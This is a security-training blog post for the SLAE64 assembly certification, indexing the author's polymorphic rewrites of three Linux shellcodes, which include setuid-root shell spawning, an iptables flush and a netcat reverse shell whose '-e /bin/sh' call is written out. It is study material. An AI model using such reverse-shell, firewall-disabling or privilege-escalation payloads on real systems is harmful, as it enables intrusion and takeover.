Skip to main content

Assignment 6

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification."
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE64-1434

Target Operating System: 64 bit Linux (x86_64 GNU/Linux)


Assignment 6:

Take up any 3 shellcodes, 64 bit Linux ones, from Shell-Storm and create polymorphic versions which do not exceed 150% of the size of the original shellcode. Bonus points if you make the polymorphic version really obscure or maybe even shorter in length than the original one.


Concerning polymorphic code detection:
https://www.fp6-noah.org/publications/papers/nemu_raid07.pdf
https://www3.cs.stonybrook.edu/~mikepo/papers/nemu.virology.pdf


I have decided that since these blog posts tend to get rather long that I will create a separate blog post for each of the 3 shellcodes that I will choose from Shell-Storm and I will simply put a link to those blog posts here.



The First Shellcode


setuid(0) + execve(/bin/sh)

The Original Shellcode: http://shell-storm.org/shellcode/files/shellcode-77.php

My Polymorphic Version: http://a41l4.blogspot.ca/2017/03/polysetuidexecve1434.html



The Second Shellcode


execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL)

The Original Shellcode: http://shell-storm.org/shellcode/files/shellcode-683.php

My Polymorphic Version: http://a41l4.blogspot.ca/2017/03/polyflushiptables1434.html


The Third shellcode


execve("/bin/nc",{"/bin/nc","ip","1337","-e","/bin/sh"},NULL)

The Original Shellcode: http://shell-storm.org/shellcode/files/shellcode-823.php

My Polymorphic Version: http://a41l4.blogspot.ca/2017/03/polynetcatrevshell1434.html


Comments

Post a Comment

Popular posts from this blog

GIAC GXPN Review – SANS SEC660 (Advanced Penetration Testing, Exploit Writing, and Ethical Hacking)   Intro  SANS is a well respected and premier cyber security training company that employs industry experts as instructors. GIAC is a company that produces testing to validate the skills of security professionals. GIAC exams validate the learning outcomes of the SANS courses. Prerequisites Before attempting this course you should be familiar with penetration testing as this is an advanced course. I would say that you should also be familiar with assembly language and shellcoding. It would be best if you have studied basic stack overflow exploits prior to this course. You will need a basic understanding of programming in C or C++ (preferably both). Scripting using Python would be a useful prerequisite. If you could learn a bit of Ruby scripting it would help for the Metasploit module creation. Be familiar with various routing and networking protocols. Course Coverage This course covers ma
Post a Comment
Read more

PolySetuidExecve1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version: http://shell-storm.org/shellcode/files/shellcode-77.php My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolySetuidExecve1434.nasm Published : https://www.exploit-db.com/exploits/41498/ Original Shellcode bytes = 49 My version: Number of bytes = 31 Number of nulls = 0 PolySetuidExecve1434.nasm Intro This shellcode when executed will first setuid(0) and then execute /bin/sh and provide you with a shell. The purpose of calling setuid(0) is, suppose that you have managed to inject this shellcode into an executable that is Set-UID root. I
Post a Comment
Read more

PolyFlushIPTables1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version: http://shell-storm.org/shellcode/files/shellcode-683.php Original size: 50 bytes (don't believe what he says :) My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolyFlushIPTables1434.nasm Published : https://www.exploit-db.com/exploits/41503/ My version: Number of bytes = 47 Number of nulls = 0 PolyFlushIPTables1434.nasm  Intro This shellcode basically just executes /sbin/iptables -F without any other parameters. man iptables "-F, --flush [chain]               Flush  the  selected  chain (all the chains in the table if none i
Post a Comment
Read more